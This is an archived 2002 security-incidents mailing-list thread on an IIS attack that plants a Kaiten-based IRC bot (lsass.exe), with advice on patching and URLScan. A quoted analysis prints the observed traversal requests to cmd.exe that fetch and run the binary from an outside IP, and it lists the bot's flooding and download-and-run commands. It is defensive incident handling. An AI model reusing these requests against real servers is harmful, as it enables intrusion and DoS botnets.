Security Incidents mailing list archives
RE: new IIS worm? (rcp lsass.exe)
From: "David LeBlanc" <dleblanc () microsoft com>
Date: Thu, 26 Sep 2002 13:24:09 -0700
If you want something that automatically installs only patches you approve, take a look at http://www.microsoft.com/windows2000/windowsupdate/sus/default.asp It might help you in your environment.
-----Original Message----- From: zeno [mailto:bugtraq () cgisecurity net] Sent: Tuesday, September 24, 2002 2:08 PM To: John Campbell Cc: incidents () securityfocus com Subject: Re: new IIS worm? (rcp lsass.exe)Windows Update from you-know-who actually does what youdescribe. I'dalways been leery of it, but tried it out recently whensetting up aW2K test server, and it performed as advertised. It didtake severaliterations to get everything updated, owing to various dependencies.When I used windows update it downloaded the patches but didn't install them. I had to manually go through each one. While this isn't a big deal I am looking for something 100 percent automated with install of the patches. Perhaps I'm missing something I deal mostly with unix. - zenoRegards, John Campbell, CISSP, GCWN Information Security Engineer Washington School Information Processing Cooperative (WSIPC) Everett, Washington, USA -----Original Message----- From: zeno [mailto:bugtraq () cgisecurity net] Sent: Tuesday, September 24, 2002 11:29 AM To: Mark Challender Cc: 'pj () esec dk'; incidents () securityfocus com Subject: Re: new IIS worm? (rcp lsass.exe)Hardening of IIS with the tools available at Microsoft and using URLSCAN with the EXE blocking on will stop these attacks. Patch, patch, patch, recheck the patches and use URLSCAN!Does anyone know of a gui windows tool that scans your system and provides you with a list of needed patches, and then allows you to select, and have it autodownload and install them? I can't seem to find one (needed mostly for iis). - zeno () cgisecurity comMark Challender Network Administrator ================== Veni, Vidi, Geeki ================== -----Original Message----- From: pj () esec dk [mailto:pj () esec dk] Sent: Monday, September 23, 2002 3:27 AM To: incidents () securityfocus com Subject: Re: new IIS worm? (rcp lsass.exe) Christian Mock:Then it seems to go after the web servers, sending the following:GET/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsas s.exe+ . HTTP/1.0..andGET/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0I've been able to get hold of that lsass.exe binary(9728 bytes),butI lack the skills to analyze it; I'll happily mail it to anybody who asks.We have seen this attack from 4 different sources since Sept. 16, and have informed the owner of 64.21.95.7 and downloaded thelsass.exe forinvestigation. Based on the attack rate this is most likely a scripted or manual attack, not a worm. Judging from the embedded string in this compressed binary it appears to be an IRC bot based on the kaiten.c code written by contem@efnet, the author of the Slapper worm : Kaiten Win32 API version 2002 by contem@efnet The binary contains these domainnames, most likeky IRCservers usedfor controlling the bot: telsa5.mine.nu (Korea) irc.logicfive.net (Taiwan) moncredo.shacknet.nu (USA) telsacredo.shacknet.nu (USA) lar.ath.cx (Taiwan) The program accepts commands to make various DOS attacksor downloadnew version or executables with http: NOTICE %s :PUSH <target> <port> <secs> = A push flooder NOTICE %s :TCP <target> <port> <secs> = A syn flooder NOTICE %s :UDP <target> <port> <secs> = A udp flooder NOTICE %s :MCON <target> <port> <times> = A connectbomb flooder NOTICE %s :NICK <nick> = Changes the nick of theclientNOTICE %s :DISABLE <pass> = Disables allpacketing fromthisclient NOTICE %s :ENABLE <pass> = Enables allpacketing fromthisclient NOTICE %s :UPDATE <http address> = Downloads afile off theweb andupdates the client NOTICE %s :RUN <http address> = Downloads afile off theweb andruns it NOTICE %s :GET <http address> = Downloads afile off thewebNOTICE %s :ADDSERVER <server> = Adds a serverto the listNOTICE %s :DELSERVER <server> = Deletes aserver from thelistNOTICE %s :LISTSERVERS = Lists serveron the listNOTICE %s :KILL = Kills the client NOTICE %s :VERSION = Requestsversion of clientNOTICE %s :HELP = Displays this There seems also to be a default account and password inthe germanlanguage included in this specific version of Kaiten. The IIS attack that tries to inject this Trojan usuallyhas anotherURL with "CONNECT chat.vtm.be:6667". This is an attemptto proxy anconnection to port 6667(IRC) on chat.vtm.be. Peter Jelver ... eSec A/S http://www.esec.dk............................................................................ . PGP Fingerprint : 47AF FFEC D48F 9C13 0C4F E687 BB8A128F D85C A7D7---------------------------------------------------------------------- ------ This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com---------------------------------------------------------------------- ------ This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com------------------------------------------------------------------------ ---- This list is provided by the SecurityFocus ARIS analyzerservice. Formore information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com-------------------------------------------------------------- -------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Re: new IIS worm? (rcp lsass.exe), (continued)
- Re: new IIS worm? (rcp lsass.exe) Nick FitzGerald (Sep 25)
- Re: new IIS worm? (rcp lsass.exe) Faisal Ashraf (Sep 26)
- Re: new IIS worm? (rcp lsass.exe) Christoph Puppe (Sep 25)
- Re: new IIS worm? (rcp lsass.exe) Nick FitzGerald (Sep 25)
- Re: new IIS worm? (rcp lsass.exe) zeno (Sep 24)
- RE: new IIS worm? (rcp lsass.exe) John Campbell (Sep 24)
- RE: new IIS worm? (rcp lsass.exe) Dostie, Joe (Sep 25)
- RE: new IIS worm? (rcp lsass.exe) webbi (Sep 25)
- RE: new IIS worm? (rcp lsass.exe) John Campbell (Sep 25)
- Re: new IIS worm? (rcp lsass.exe) zeno (Sep 25)
- RE: new IIS worm? (rcp lsass.exe) Gaydosh, Adam (Sep 25)
- RE: new IIS worm? (rcp lsass.exe) David LeBlanc (Sep 26)
- RE: new IIS worm? (rcp lsass.exe) Dallas Jordan (Sep 26)
- RE: new IIS worm? (rcp lsass.exe) Bax . Plemons (Sep 26)
- Re: new IIS worm? (rcp lsass.exe) Muhammad Faisal Rauf Danka (Sep 27)